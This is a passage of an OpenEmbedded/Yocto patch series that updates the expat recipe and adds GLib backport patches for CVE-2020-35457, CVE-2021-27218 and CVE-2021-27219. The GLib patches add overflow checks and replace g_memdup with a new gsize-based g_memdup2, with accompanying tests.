+diff --git a/Makefile.am b/Makefile.am
+index 5e1d37dd..f7a6dece 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -36,7 +36,7 @@ AUTOMAKE_OPTIONS = \
+ subdir-objects
+
+ ACLOCAL_AMFLAGS = -I m4
+-LIBTOOLFLAGS = --verbose
++LIBTOOLFLAGS = --verbose --tag=CC
+
+ SUBDIRS = lib # lib goes first to build first
+ if WITH_EXAMPLES
--
-2.7.4
+2.32.0
diff --git a/meta/recipes-core/expat/expat_2.2.9.bb b/meta/recipes-core/expat/expat_2.2.9.bb
index 8f3db41352..8a5006e59a 100644
--- a/meta/recipes-core/expat/expat_2.2.9.bb
+++ b/meta/recipes-core/expat/expat_2.2.9.bb
@@ -1,22 +1,35 @@
SUMMARY = "A stream-oriented XML parser library"
DESCRIPTION = "Expat is an XML parser library written in C. It is a stream-oriented parser in which an application registers handlers for things the parser might find in the XML document (like start tags)"
-HOMEPAGE = "http://expat.sourceforge.net/"
+HOMEPAGE = "https://github.com/libexpat/libexpat"
SECTION = "libs"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=5b8620d98e49772d95fc1d291c26aa79"
-SRC_URI = "${SOURCEFORGE_MIRROR}/expat/expat-${PV}.tar.bz2 \
+SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \
+ file://CVE-2013-0340.patch \
+ file://CVE-2021-45960.patch \
+ file://CVE-2021-46143.patch \
+ file://CVE-2022-22822-27.patch \
+ file://CVE-2022-23852.patch \
+ file://CVE-2022-23990.patch \
+ file://CVE-2022-25235.patch \
+ file://CVE-2022-25236.patch \
+ file://CVE-2022-25313.patch \
+ file://CVE-2022-25313-regression.patch \
+ file://CVE-2022-25314.patch \
+ file://CVE-2022-25315.patch \
file://libtool-tag.patch \
- "
+ file://CVE-2022-40674.patch \
+ file://CVE-2022-43680.patch \
+ "
-SRC_URI[md5sum] = "875a2c2ff3e8eb9e5a5cd62db2033ab5"
-SRC_URI[sha256sum] = "f1063084dc4302a427dabcca499c8312b3a32a29b7d2506653ecc8f950a9a237"
+SRCREV = "a7bc26b69768f7fb24f0c7976fae24b157b85b13"
inherit autotools lib_package
-do_configure_prepend () {
- rm -f ${S}/conftools/libtool.m4
-}
+S = "${WORKDIR}/git/expat"
BBCLASSEXTEND = "native nativesdk"
+
+CVE_PRODUCT = "expat libexpat"
diff --git a/meta/recipes-core/fts/fts_1.2.7.bb b/meta/recipes-core/fts/fts_1.2.7.bb
index 589ae0e916..d3b0f31eda 100644
--- a/meta/recipes-core/fts/fts_1.2.7.bb
+++ b/meta/recipes-core/fts/fts_1.2.7.bb
@@ -3,13 +3,14 @@
SUMMARY = "Implementation of ftsfor musl libc packages"
HOMEPAGE = "https://github.com/pullmoll/musl-fts"
+DESCRIPTION = "The musl-fts package implements the fts(3) functions fts_open, fts_read, fts_children, fts_set and fts_close, which are missing in musl libc."
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=5ffe358174aad383f1b69ce3b53da982"
SECTION = "libs"
SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472"
-SRC_URI = "git://github.com/pullmoll/musl-fts.git"
+SRC_URI = "git://github.com/pullmoll/musl-fts.git;branch=master;protocol=https"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch
new file mode 100644
index 0000000000..17dcada613
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch
@@ -0,0 +1,41 @@
+From 63c5b62f0a984fac9a9700b12f54fe878e016a5d Mon Sep 17 00:00:00 2001
+From: Philip Withnall <withnall@endlessm.com>
+Date: Wed, 2 Sep 2020 12:38:09 +0100
+Subject: [PATCH] goption: Add a precondition to avoid GOptionEntry list
+ overflow
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If the calling code adds more option entries than `G_MAXSIZE` then
+there’ll be an integer overflow. This seems vanishingly unlikely (given
+that all callers use static option entry lists), but add a precondition
+anyway.
+
+Signed-off-by: Philip Withnall <withnall@endlessm.com>
+
+Fixes: #2197
+---
+ glib/goption.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+CVE: CVE-2020-35457
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/glib/-/commit/63c5b62f0a984fac9a9700b12f54fe878e016a5d]
+Comment: adjusted offset by -5 to fix patch fuzz warning
+
+diff --git a/glib/goption.c b/glib/goption.c
+index 9f5b977c4..bb9093a33 100644
+--- a/glib/goption.c
++++ b/glib/goption.c
+@@ -2417,6 +2417,8 @@ g_option_group_add_entries (GOptionGroup *group,
+
+ for (n_entries = 0; entries[n_entries].long_name != NULL; n_entries++) ;
+
++ g_return_if_fail (n_entries <= G_MAXSIZE - group->n_entries);
++
+ group->entries = g_renew (GOptionEntry, group->entries, group->n_entries + n_entries);
+
+ /* group->entries could be NULL in the trivial case where we add no
+--
+2.20.1
+
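The added precondition compares against the remaining headroom rather than the sum, so the check itself cannot overflow. A minimal, hypothetical GLib-style sketch of the same idiom (the ItemList type and function are invented for illustration):

```
#include <glib.h>

typedef struct { gpointer *items; gsize n_items; } ItemList;

static void
item_list_append_many (ItemList *list, gpointer *add, gsize n_add)
{
  /* refuse to grow past G_MAXSIZE instead of letting the addition wrap */
  g_return_if_fail (n_add <= G_MAXSIZE - list->n_items);

  list->items = g_renew (gpointer, list->items, list->n_items + n_add);
  for (gsize i = 0; i < n_add; i++)
    list->items[list->n_items + i] = add[i];
  list->n_items += n_add;
}
```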
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
new file mode 100644
index 0000000000..6257763d8d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
@@ -0,0 +1,129 @@
+Backport of:
+
+From 0f384c88a241bbbd884487b1c40b7b75f1e638d3 Mon Sep 17 00:00:00 2001
+From: Krzesimir Nowak <qdlacz@gmail.com>
+Date: Wed, 10 Feb 2021 23:51:07 +0100
+Subject: [PATCH] gbytearray: Do not accept too large byte arrays
+
+GByteArray uses guint for storing the length of the byte array, but it
+also has a constructor (g_byte_array_new_take) that takes length as a
+gsize. gsize may be larger than guint (64 bits for gsize vs 32 bits
+for guint). It is possible to call the function with a value greater
+than G_MAXUINT, which will result in silent length truncation. This
+may happen as a result of unreffing GBytes into GByteArray, so rather
+be loud about it.
+
+(Test case tweaked by Philip Withnall.)
+
+(Backport 2.66: Add #include gstrfuncsprivate.h in the test case for
+`g_memdup2()`.)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27218
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/garray.c | 6 ++++++
+ glib/gbytes.c | 4 ++++
+ glib/tests/bytes.c | 35 ++++++++++++++++++++++++++++++++++-
+ 3 files changed, 44 insertions(+), 1 deletion(-)
+
+--- a/glib/garray.c
++++ b/glib/garray.c
+@@ -2234,6 +2234,10 @@ g_byte_array_steal (GByteArray *array,
+ * Create byte array containing the data. The data will be owned by the array
+ * and will be freed with g_free(), i.e. it could be allocated using g_strdup().
+ *
++ * Do not use it if @len is greater than %G_MAXUINT. #GByteArray
++ * stores the length of its data in #guint, which may be shorter than
++ * #gsize.
++ *
+ * Since: 2.32
+ *
+ * Returns: (transfer full): a new #GByteArray
+@@ -2245,6 +2249,8 @@ g_byte_array_new_take (guint8 *data,
+ GByteArray *array;
+ GRealArray *real;
+
++ g_return_val_if_fail (len <= G_MAXUINT, NULL);
++
+ array = g_byte_array_new ();
+ real = (GRealArray *)array;
+ g_assert (real->data == NULL);
+--- a/glib/gbytes.c
++++ b/glib/gbytes.c
+@@ -519,6 +519,10 @@ g_bytes_unref_to_data (GBytes *bytes,
+ * g_bytes_new(), g_bytes_new_take() or g_byte_array_free_to_bytes(). In all
+ * other cases the data is copied.
+ *
++ * Do not use it if @bytes contains more than %G_MAXUINT
++ * bytes. #GByteArray stores the length of its data in #guint, which
++ * may be shorter than #gsize, that @bytes is using.
++ *
+ * Returns: (transfer full): a new mutable #GByteArray containing the same byte data
+ *
+ * Since: 2.32
+--- a/glib/tests/bytes.c
++++ b/glib/tests/bytes.c
+@@ -10,12 +10,12 @@
+ */
+
+ #undef G_DISABLE_ASSERT
+-#undef G_LOG_DOMAIN
+
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <string.h>
+ #include "glib.h"
++#include "glib/gstrfuncsprivate.h"
+
+ /* Keep in sync with glib/gbytes.c */
+ struct _GBytes
+@@ -334,6 +334,38 @@ test_to_array_transferred (void)
+ }
+
+ static void
++test_to_array_transferred_oversize (void)
++{
++ g_test_message ("g_bytes_unref_to_array() can only take GBytes up to "
++ "G_MAXUINT in length; test that longer ones are rejected");
++
++ if (sizeof (guint) >= sizeof (gsize))
++ {
++ g_test_skip ("Skipping test as guint is not smaller than gsize");
++ }
++ else if (g_test_undefined ())
++ {
++ GByteArray *array = NULL;
++ GBytes *bytes = NULL;
++ gpointer data = g_memdup2 (NYAN, N_NYAN);
++ gsize len = ((gsize) G_MAXUINT) + 1;
++
++ bytes = g_bytes_new_take (data, len);
++ g_test_expect_message (G_LOG_DOMAIN, G_LOG_LEVEL_CRITICAL,
++ "g_byte_array_new_take: assertion 'len <= G_MAXUINT' failed");
++ array = g_bytes_unref_to_array (g_steal_pointer (&bytes));
++ g_test_assert_expected_messages ();
++ g_assert_null (array);
++
++ g_free (data);
++ }
++ else
++ {
++ g_test_skip ("Skipping test as testing undefined behaviour is disabled");
++ }
++}
++
++static void
+ test_to_array_two_refs (void)
+ {
+ gconstpointer memory;
+@@ -410,6 +442,7 @@ main (int argc, char *argv[])
+ g_test_add_func ("/bytes/to-array/transfered", test_to_array_transferred);
+ g_test_add_func ("/bytes/to-array/two-refs", test_to_array_two_refs);
+ g_test_add_func ("/bytes/to-array/non-malloc", test_to_array_non_malloc);
++ g_test_add_func ("/bytes/to-array/transferred/oversize", test_to_array_transferred_oversize);
+ g_test_add_func ("/bytes/null", test_null);
+
+ return g_test_run ();
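
With this change, g_byte_array_new_take() — and therefore g_bytes_unref_to_array() — rejects lengths above G_MAXUINT with a critical. A hedged sketch of a caller-side guard that code holding potentially huge GBytes could use; purely illustrative, not part of the patch:

```
#include <glib.h>

static GByteArray *
bytes_to_array_checked (GBytes *bytes)
{
  if (g_bytes_get_size (bytes) > G_MAXUINT)
    {
      g_bytes_unref (bytes);
      return NULL;          /* too large for GByteArray's guint length */
    }
  return g_bytes_unref_to_array (bytes);
}
```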
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
new file mode 100644
index 0000000000..2af9dd6aa4
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
@@ -0,0 +1,170 @@
+Backport of:
+
+From 5e5f75a77e399c638be66d74e5daa8caeb433e00 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:30:52 +0000
+Subject: [PATCH 01/11] gstrfuncs: Add internal g_memdup2() function
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This will replace the existing `g_memdup()` function for use within
+GLib. It has an unavoidable security flaw of taking its `byte_size`
+argument as a `guint` rather than as a `gsize`. Most callers will
+expect it to be a `gsize`, and may pass in large values which could
+silently be truncated, resulting in an undersize allocation compared
+to what the caller expects.
+
+This could lead to a classic buffer overflow vulnerability for many
+callers of `g_memdup()`.
+
+`g_memdup2()`, in comparison, takes its `byte_size` as a `gsize`.
+
+Spotted by Kevin Backhouse of GHSL.
+
+In GLib 2.68, `g_memdup2()` will be a new public API. In this version
+for backport to older stable releases, it’s a new `static inline` API
+in a private header, so that use of `g_memdup()` within GLib can be
+fixed without adding a new API in a stable release series.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: GHSL-2021-045
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ docs/reference/glib/meson.build | 1 +
+ glib/gstrfuncsprivate.h | 55 +++++++++++++++++++++++++++++++++
+ glib/meson.build | 1 +
+ glib/tests/strfuncs.c | 23 ++++++++++++++
+ 4 files changed, 80 insertions(+)
+ create mode 100644 glib/gstrfuncsprivate.h
+
+--- a/docs/reference/glib/meson.build
++++ b/docs/reference/glib/meson.build
+@@ -22,6 +22,7 @@ if get_option('gtk_doc')
+ 'gprintfint.h',
+ 'gmirroringtable.h',
+ 'gscripttable.h',
++ 'gstrfuncsprivate.h',
+ 'glib-mirroring-tab',
+ 'gnulib',
+ 'pcre',
+--- /dev/null
++++ b/glib/gstrfuncsprivate.h
+@@ -0,0 +1,55 @@
++/* GLIB - Library of useful routines for C programming
++ * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
++ *
++ * This library is free software; you can redistribute it and/or
++ * modify it under the terms of the GNU Lesser General Public
++ * License as published by the Free Software Foundation; either
++ * version 2.1 of the License, or (at your option) any later version.
++ *
++ * This library is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ * Lesser General Public License for more details.
++ *
++ * You should have received a copy of the GNU Lesser General Public
++ * License along with this library; if not, see <http://www.gnu.org/licenses/>.
++ */
++
++#include <glib.h>
++#include <string.h>
++
++/*
++ * g_memdup2:
++ * @mem: (nullable): the memory to copy.
++ * @byte_size: the number of bytes to copy.
++ *
++ * Allocates @byte_size bytes of memory, and copies @byte_size bytes into it
++ * from @mem. If @mem is %NULL it returns %NULL.
++ *
++ * This replaces g_memdup(), which was prone to integer overflows when
++ * converting the argument from a #gsize to a #guint.
++ *
++ * This static inline version is a backport of the new public API from
++ * GLib 2.68, kept internal to GLib for backport to older stable releases.
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2319.
++ *
++ * Returns: (nullable): a pointer to the newly-allocated copy of the memory,
++ * or %NULL if @mem is %NULL.
++ * Since: 2.68
++ */
++static inline gpointer
++g_memdup2 (gconstpointer mem,
++ gsize byte_size)
++{
++ gpointer new_mem;
++
++ if (mem && byte_size != 0)
++ {
++ new_mem = g_malloc (byte_size);
++ memcpy (new_mem, mem, byte_size);
++ }
++ else
++ new_mem = NULL;
++
++ return new_mem;
++}
+--- a/glib/meson.build
++++ b/glib/meson.build
+@@ -268,6 +268,7 @@ glib_sources = files(
+ 'gslist.c',
+ 'gstdio.c',
+ 'gstrfuncs.c',
++ 'gstrfuncsprivate.h',
+ 'gstring.c',
+ 'gstringchunk.c',
+ 'gtestutils.c',
+--- a/glib/tests/strfuncs.c
++++ b/glib/tests/strfuncs.c
+@@ -32,6 +32,8 @@
+ #include <string.h>
+ #include "glib.h"
+
++#include "gstrfuncsprivate.h"
++
+ #if defined (_MSC_VER) && (_MSC_VER <= 1800)
+ #define isnan(x) _isnan(x)
+
+@@ -219,6 +221,26 @@ test_memdup (void)
+ g_free (str_dup);
+ }
+
++/* Testing g_memdup2() function with various positive and negative cases */
++static void
++test_memdup2 (void)
++{
++ gchar *str_dup = NULL;
++ const gchar *str = "The quick brown fox jumps over the lazy dog";
++
++ /* Testing negative cases */
++ g_assert_null (g_memdup2 (NULL, 1024));
++ g_assert_null (g_memdup2 (str, 0));
++ g_assert_null (g_memdup2 (NULL, 0));
++
++ /* Testing normal usage cases */
++ str_dup = g_memdup2 (str, strlen (str) + 1);
++ g_assert_nonnull (str_dup);
++ g_assert_cmpstr (str, ==, str_dup);
++
++ g_free (str_dup);
++}
++
+ /* Testing g_strpcpy() function with various positive and negative cases */
+ static void
+ test_stpcpy (void)
+@@ -2523,6 +2545,7 @@ main (int argc,
+ g_test_add_func ("/strfuncs/has-prefix", test_has_prefix);
+ g_test_add_func ("/strfuncs/has-suffix", test_has_suffix);
+ g_test_add_func ("/strfuncs/memdup", test_memdup);
++ g_test_add_func ("/strfuncs/memdup2", test_memdup2);
+ g_test_add_func ("/strfuncs/stpcpy", test_stpcpy);
+ g_test_add_func ("/strfuncs/str_match_string", test_str_match_string);
+ g_test_add_func ("/strfuncs/str_tokenize_and_fold", test_str_tokenize_and_fold);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
new file mode 100644
index 0000000000..20137ea5f3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
@@ -0,0 +1,249 @@
+From be8834340a2d928ece82025463ae23dee2c333d0 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:37:56 +0000
+Subject: [PATCH 02/11] gio: Use g_memdup2() instead of g_memdup() in obvious
+ places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()`), so that they use
+`g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gdbusconnection.c | 5 +++--
+ gio/gdbusinterfaceskeleton.c | 3 ++-
+ gio/gfile.c | 7 ++++---
+ gio/gsettingsschema.c | 5 +++--
+ gio/gwin32registrykey.c | 8 +++++---
+ gio/tests/async-close-output-stream.c | 6 ++++--
+ gio/tests/gdbus-export.c | 5 +++--
+ gio/win32/gwinhttpfile.c | 9 +++++----
+ 8 files changed, 29 insertions(+), 19 deletions(-)
+
+--- a/gio/gdbusconnection.c
++++ b/gio/gdbusconnection.c
+@@ -110,6 +110,7 @@
+ #include "gasyncinitable.h"
+ #include "giostream.h"
+ #include "gasyncresult.h"
++#include "gstrfuncsprivate.h"
+ #include "gtask.h"
+ #include "gmarshal-internal.h"
+
+@@ -4007,7 +4008,7 @@ _g_dbus_interface_vtable_copy (const GDB
+ /* Don't waste memory by copying padding - remember to update this
+ * when changing struct _GDBusInterfaceVTable in gdbusconnection.h
+ */
+- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
+ }
+
+ static void
+@@ -4024,7 +4025,7 @@ _g_dbus_subtree_vtable_copy (const GDBus
+ /* Don't waste memory by copying padding - remember to update this
+ * when changing struct _GDBusSubtreeVTable in gdbusconnection.h
+ */
+- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
+ }
+
+ static void
+--- a/gio/gdbusinterfaceskeleton.c
++++ b/gio/gdbusinterfaceskeleton.c
+@@ -28,6 +28,7 @@
+ #include "gdbusmethodinvocation.h"
+ #include "gdbusconnection.h"
+ #include "gmarshal-internal.h"
++#include "gstrfuncsprivate.h"
+ #include "gtask.h"
+ #include "gioerror.h"
+
+@@ -701,7 +702,7 @@ add_connection_locked (GDBusInterfaceSke
+ * properly before building the hooked_vtable, so we create it
+ * once at the last minute.
+ */
+- interface_->priv->hooked_vtable = g_memdup (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
++ interface_->priv->hooked_vtable = g_memdup2 (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
+ interface_->priv->hooked_vtable->method_call = skeleton_intercept_handle_method_call;
+ }
+
+--- a/gio/gfile.c
++++ b/gio/gfile.c
+@@ -60,6 +60,7 @@
+ #include "gasyncresult.h"
+ #include "gioerror.h"
+ #include "glibintl.h"
++#include "gstrfuncsprivate.h"
+
+
+ /**
+@@ -7854,7 +7855,7 @@ measure_disk_usage_progress (gboolean re
+ g_main_context_invoke_full (g_task_get_context (task),
+ g_task_get_priority (task),
+ measure_disk_usage_invoke_progress,
+- g_memdup (&progress, sizeof progress),
++ g_memdup2 (&progress, sizeof progress),
+ g_free);
+ }
+
+@@ -7872,7 +7873,7 @@ measure_disk_usage_thread (GTask
+ data->progress_callback ? measure_disk_usage_progress : NULL, task,
+ &result.disk_usage, &result.num_dirs, &result.num_files,
+ &error))
+- g_task_return_pointer (task, g_memdup (&result, sizeof result), g_free);
++ g_task_return_pointer (task, g_memdup2 (&result, sizeof result), g_free);
+ else
+ g_task_return_error (task, error);
+ }
+@@ -7896,7 +7897,7 @@ g_file_real_measure_disk_usage_async (GF
+
+ task = g_task_new (file, cancellable, callback, user_data);
+ g_task_set_source_tag (task, g_file_real_measure_disk_usage_async);
+- g_task_set_task_data (task, g_memdup (&data, sizeof data), g_free);
++ g_task_set_task_data (task, g_memdup2 (&data, sizeof data), g_free);
+ g_task_set_priority (task, io_priority);
+
+ g_task_run_in_thread (task, measure_disk_usage_thread);
+--- a/gio/gsettingsschema.c
++++ b/gio/gsettingsschema.c
+@@ -20,6 +20,7 @@
+
+ #include "gsettingsschema-internal.h"
+ #include "gsettings.h"
++#include "gstrfuncsprivate.h"
+
+ #include "gvdb/gvdb-reader.h"
+ #include "strinfo.c"
+@@ -1067,9 +1068,9 @@ g_settings_schema_list_children (GSettin
+
+ if (g_str_has_suffix (key, "/"))
+ {
+- gint length = strlen (key);
++ gsize length = strlen (key);
+
+- strv[j] = g_memdup (key, length);
++ strv[j] = g_memdup2 (key, length);
+ strv[j][length - 1] = '\0';
+ j++;
+ }
+--- a/gio/gwin32registrykey.c
++++ b/gio/gwin32registrykey.c
+@@ -28,6 +28,8 @@
+ #include <ntstatus.h>
+ #include <winternl.h>
+
++#include "gstrfuncsprivate.h"
++
+ #ifndef _WDMDDK_
+ typedef enum _KEY_INFORMATION_CLASS {
+ KeyBasicInformation,
+@@ -247,7 +249,7 @@ g_win32_registry_value_iter_copy (const
+ new_iter->value_name_size = iter->value_name_size;
+
+ if (iter->value_data != NULL)
+- new_iter->value_data = g_memdup (iter->value_data, iter->value_data_size);
++ new_iter->value_data = g_memdup2 (iter->value_data, iter->value_data_size);
+
+ new_iter->value_data_size = iter->value_data_size;
+
+@@ -268,8 +270,8 @@ g_win32_registry_value_iter_copy (const
+ new_iter->value_data_expanded_charsize = iter->value_data_expanded_charsize;
+
+ if (iter->value_data_expanded_u8 != NULL)
+- new_iter->value_data_expanded_u8 = g_memdup (iter->value_data_expanded_u8,
+- iter->value_data_expanded_charsize);
++ new_iter->value_data_expanded_u8 = g_memdup2 (iter->value_data_expanded_u8,
++ iter->value_data_expanded_charsize);
+
+ new_iter->value_data_expanded_u8_size = iter->value_data_expanded_charsize;
+
+--- a/gio/tests/async-close-output-stream.c
++++ b/gio/tests/async-close-output-stream.c
+@@ -24,6 +24,8 @@
+ #include <stdlib.h>
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
++
+ #define DATA_TO_WRITE "Hello world\n"
+
+ typedef struct
+@@ -147,9 +149,9 @@ prepare_data (SetupData *data,
+
+ data->expected_size = g_memory_output_stream_get_data_size (G_MEMORY_OUTPUT_STREAM (data->data_stream));
+
+- g_assert_cmpint (data->expected_size, >, 0);
++ g_assert_cmpuint (data->expected_size, >, 0);
+
+- data->expected_output = g_memdup (written, (guint)data->expected_size);
++ data->expected_output = g_memdup2 (written, data->expected_size);
+
+ /* then recreate the streams and prepare them for the asynchronous close */
+ destroy_streams (data);
+--- a/gio/tests/gdbus-export.c
++++ b/gio/tests/gdbus-export.c
+@@ -23,6 +23,7 @@
+ #include <string.h>
+
+ #include "gdbus-tests.h"
++#include "gstrfuncsprivate.h"
+
+ /* all tests rely on a shared mainloop */
+ static GMainLoop *loop = NULL;
+@@ -671,7 +672,7 @@ subtree_introspect (GDBusConnection
+ g_assert_not_reached ();
+ }
+
+- return g_memdup (interfaces, 2 * sizeof (void *));
++ return g_memdup2 (interfaces, 2 * sizeof (void *));
+ }
+
+ static const GDBusInterfaceVTable *
+@@ -727,7 +728,7 @@ dynamic_subtree_introspect (GDBusConnect
+ {
+ const GDBusInterfaceInfo *interfaces[2] = { &dyna_interface_info, NULL };
+
+- return g_memdup (interfaces, 2 * sizeof (void *));
++ return g_memdup2 (interfaces, 2 * sizeof (void *));
+ }
+
+ static const GDBusInterfaceVTable *
+--- a/gio/win32/gwinhttpfile.c
++++ b/gio/win32/gwinhttpfile.c
+@@ -29,6 +29,7 @@
+ #include "gio/gfile.h"
+ #include "gio/gfileattribute.h"
+ #include "gio/gfileinfo.h"
++#include "gstrfuncsprivate.h"
+ #include "gwinhttpfile.h"
+ #include "gwinhttpfileinputstream.h"
+ #include "gwinhttpfileoutputstream.h"
+@@ -393,10 +394,10 @@
+ child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
+ child->vfs = winhttp_file->vfs;
+ child->url = winhttp_file->url;
+- child->url.lpszScheme = g_memdup (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
+- child->url.lpszHostName = g_memdup (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
+- child->url.lpszUserName = g_memdup (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
+- child->url.lpszPassword = g_memdup (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
+ child->url.lpszUrlPath = wnew_path;
+ child->url.dwUrlPathLength = wcslen (wnew_path);
+ child->url.lpszExtraInfo = NULL;
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
new file mode 100644
index 0000000000..eceff161a6
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
@@ -0,0 +1,131 @@
+From 6110caea45b235420b98cd41d845cc92238f6781 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:39:25 +0000
+Subject: [PATCH 03/11] gobject: Use g_memdup2() instead of g_memdup() in
+ obvious places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()`), so that they use
+`g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gobject/gsignal.c | 3 ++-
+ gobject/gtype.c | 9 +++++----
+ gobject/gtypemodule.c | 3 ++-
+ gobject/tests/param.c | 4 +++-
+ 4 files changed, 12 insertions(+), 7 deletions(-)
+
+--- a/gobject/gsignal.c
++++ b/gobject/gsignal.c
+@@ -28,6 +28,7 @@
+ #include <signal.h>
+
+ #include "gsignal.h"
++#include "gstrfuncsprivate.h"
+ #include "gtype-private.h"
+ #include "gbsearcharray.h"
+ #include "gvaluecollector.h"
+@@ -1809,7 +1810,7 @@ g_signal_newv (const gchar *signal
+ node->single_va_closure_is_valid = FALSE;
+ node->flags = signal_flags & G_SIGNAL_FLAGS_MASK;
+ node->n_params = n_params;
+- node->param_types = g_memdup (param_types, sizeof (GType) * n_params);
++ node->param_types = g_memdup2 (param_types, sizeof (GType) * n_params);
+ node->return_type = return_type;
+ node->class_closure_bsa = NULL;
+ if (accumulator)
+--- a/gobject/gtype.c
++++ b/gobject/gtype.c
+@@ -33,6 +33,7 @@
+
+ #include "glib-private.h"
+ #include "gconstructor.h"
++#include "gstrfuncsprivate.h"
+
+ #ifdef G_OS_WIN32
+ #include <windows.h>
+@@ -1470,7 +1471,7 @@ type_add_interface_Wm (TypeNode
